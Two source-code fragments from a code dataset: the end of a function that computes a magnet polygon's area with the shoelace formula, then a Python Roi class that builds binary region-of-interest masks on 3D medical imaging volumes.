    # Z2: foot of the perpendicular from Zc1 onto the magnet edge line
    # (line of slope -tan(W1) with offset W2/cos(W1))
    x2 = (-1 / tan(self.W1) * xc1 + yc1 - self.W2 / cos(self.W1)) / -(
        tan(self.W1) + 1 / tan(self.W1)
    )
    y2 = -tan(self.W1) * x2 + self.W2 / cos(self.W1)
    Z2 = x2 + 1j * y2
    # Z3: intersection of that edge line with the circle of radius R2
    # (quadratic in x; the positive root is taken)
    a3 = 1 + tan(self.W1) ** 2
    b3 = -2 * tan(self.W1) * self.W2 / cos(self.W1)
    c3 = (self.W2 / cos(self.W1)) ** 2 - self.R2 ** 2
    x3 = (-b3 + sqrt(b3 ** 2 - 4 * a3 * c3)) / (2 * a3)
    y3 = -tan(self.W1) * x3 + self.W2 / cos(self.W1)
    Z3 = x3 + 1j * y3
    # Z5: corner at depth H1 below the bore radius, half-width W0/2
    x5 = Rbo - self.H1
    y5 = -self.W0 / 2
    Z5 = x5 + 1j * y5
    # Zc2: center of the fillet arc of radius R1 near Z5
    xc2 = Rbo - self.H1 - self.R1
    yc2 = -self.W0 / 2
    Zc2 = xc2 + 1j * yc2
    # Z4: tangency point of the line from Z3 with the circle (Zc2, R1)
    # (alpha2 is the slope of the tangent line, from a quadratic)
    a4 = (xc2 - x3) ** 2 - self.R1 ** 2
    b4 = 2 * (xc2 - x3) * (y3 - yc2)
    c4 = (y3 - yc2) ** 2 - self.R1 ** 2
    alpha2 = (-b4 - sqrt(b4 ** 2 - 4 * a4 * c4)) / (2 * a4)
    x4 = (xc2 / alpha2 + yc2 + alpha2 * x3 - y3) / (alpha2 + 1 / alpha2)
    y4 = alpha2 * (x4 - x3) + y3
    Z4 = x4 + 1j * y4
    # symmetry: mirror Z5..Z1 about the x-axis to get Z6..Z10
    Z6 = Z5.conjugate()
    x6 = Z6.real
    y6 = Z6.imag
    Z7 = Z4.conjugate()
    x7 = Z7.real
    y7 = Z7.imag
    Z8 = Z3.conjugate()
    x8 = Z8.real
    y8 = Z8.imag
    Z9 = Z2.conjugate()
    x9 = Z9.real
    y9 = Z9.imag
    Z10 = Z1.conjugate()
    x10 = Z10.real
    y10 = Z10.imag
    # Shoelace formula: sum of x_i * y_{i+1} over the closed polygon
    S_magnet_1 = (
        x1 * y2
        + x2 * y3
        + x3 * y4
        + x4 * y5
        + x5 * y6
        + x6 * y7
        + x7 * y8
        + x8 * y9
        + x9 * y10
        + x10 * y1
    )
    # ... minus the sum of x_{i+1} * y_i
    S_magnet_2 = (
        x1 * y10
        + x2 * y1
        + x3 * y2
        + x4 * y3
        + x5 * y4
        + x6 * y5
        + x7 * y6
        + x8 * y7
        + x9 * y8
        + x10 * y9
    )
    # half the absolute cross-product sum = polygon area
    S_magnet = 0.5 * abs(S_magnet_1 - S_magnet_2)
    return S_magnet
| 3.015625 | 3 |
dicom_to_cnn/model/petctviewer/Roi.py | wendyrvllr/Dicom-To-CNN | 15 | 12760350 | import numpy as np
import matplotlib.patches
class Roi():
    """A class to represent a ROI (region of interest) drawn on a 3D volume."""

    def __init__(self, axis:int, first_slice:int, last_slice:int, roi_number:int, type_number:int, list_point:list, volume_dimension:tuple):
        """constructor

        Args:
            axis (int): [1 for axial, 2 for coronal, 3 for sagittal]
            first_slice (int): [slice number where ROI begins]
            last_slice (int): [slice number where ROI ends]
            roi_number (int): [roi number]
            type_number (int): [0 for nifti, 1 for axial polygon, 11 for axial ellipse, 2 for coronal polygon, 12 for coronal ellipse, 3 for sagittal polygon, 13 for sagittal ellipse]
            list_point (list): [list of [x,y] coordinates of polygon or ellipse / list of [x,y,z] coordinates of nifti]
            volume_dimension (tuple): [(shape x, shape y, shape z)]
        """
        self.axis = axis
        self.first_slice = first_slice
        self.last_slice = last_slice
        self.roi_number = roi_number
        self.type_number = type_number
        self.list_point = list_point
        # numpy copy of the points for vectorized min/max computations
        self.list_point_np = np.asarray(self.list_point)
        # volume shape, kept as individual dimensions
        self.x = volume_dimension[0]
        self.y = volume_dimension[1]
        self.z = volume_dimension[2]

    def __get_min_max_of_roi(self) -> tuple:
        """Compute extrema of the ROI in which we will loop to find included voxels.

        For polygons the extrema are the min/max of the point coordinates.
        For ellipses, the stored points are interpreted as center plus
        axis points.
        NOTE(review): the ellipse branch assumes point 0 is the center,
        point 1 fixes the half-height and point 2 the half-width —
        confirm against the drawing tool that produced list_point.

        Returns:
            [tuple] -- xmin, xmax, ymin, ymax
        """
        points_array = self.list_point_np
        all_x = points_array[:][:,0]
        all_y = points_array[:][:,1]
        if (self.type_number == 1 or self.type_number == 2 or self.type_number == 3) : #POLYGONE
            xmin = min(all_x)
            xmax = max(all_x)
            ymin = min(all_y)
            ymax = max(all_y)
            return xmin , xmax , ymin , ymax
        else : #ELLIPSE
            height = abs(all_x[0] - all_x[1])
            width = abs(all_y[0] - all_y[2])
            xmin = all_x[0] - height
            xmax = all_x[0] + height
            ymin = all_y[0] - width
            ymax = all_y[0] + width
            return xmin , xmax , ymin, ymax

    def mask_roi_in_slice(self, patch:matplotlib.patches) -> list:
        """Collect all [x,y] pixels of the bounding box that lie inside the patch.

        Args:
            patch (matplotlib.patches): [polygon or ellipse]

        Returns:
            [list]: [list of [x,y] coordinates]
        """
        points = []
        xmin, xmax, ymin, ymax = self.__get_min_max_of_roi()
        for x in range(xmin, xmax + 1):
            for y in range(ymin, ymax + 1) :
                # negative radius slightly shrinks the hit test, so pixels
                # exactly on the border are excluded
                # NOTE(review): per matplotlib contains_point semantics — confirm
                if patch.contains_point([x,y], radius = -1e-9) :
                    points.append([x,y])
        return points

    def get_empty_np_array(self) -> np.ndarray:
        """Return a zero-filled numpy array shaped like the volume (x, y, z).

        Returns:
            [np.ndarray] -- zero filled numpy array
        """
        return (np.zeros((self.x, self.y, self.z)))

    def coronal_to_axial(self, np_array_3D:np.ndarray) -> np.ndarray:
        """Transform a coronal 3D ndarray into an axial 3D ndarray
        (swaps axes 0 and 2).

        Args:
            np_array_3D (np.ndarray): [ROI ndarray]

        Returns:
            [np.ndarray]: [axial ndarray]
        """
        return np.transpose(np_array_3D, (2,1,0))

    def sagittal_to_axial(self, np_array_3D:np.ndarray) -> np.ndarray:
        """Transform a sagittal 3D ndarray into an axial 3D ndarray
        (swaps axes 1 and 2).

        Args:
            np_array_3D (np.ndarray): [ROI ndarray]

        Returns:
            [np.ndarray]: [axial ndarray]
        """
        return np.transpose(np_array_3D, (0,2,1))

    def get_mask(self, list_points:list) -> np.ndarray : #list_points = [[x,y,z], [x,y,z], ...]
        """Generate an empty ndarray and set the ROI coordinates to 1.

        Args:
            list_points (list): [ [[x,y,z], [x,y,z], [x,y,z], ...] ]

        Returns:
            [np.ndarray]: [binary ndarray of the ROI]
        """
        np_array_3D = self.get_empty_np_array()
        for point in list_points:
            # note the [y, x, z] index order: axis 0 is the row (y),
            # axis 1 the column (x)
            np_array_3D[point[1], point[0] , point[2]] = 1
        return np_array_3D.astype(np.uint8)
| 2.921875 | 3 |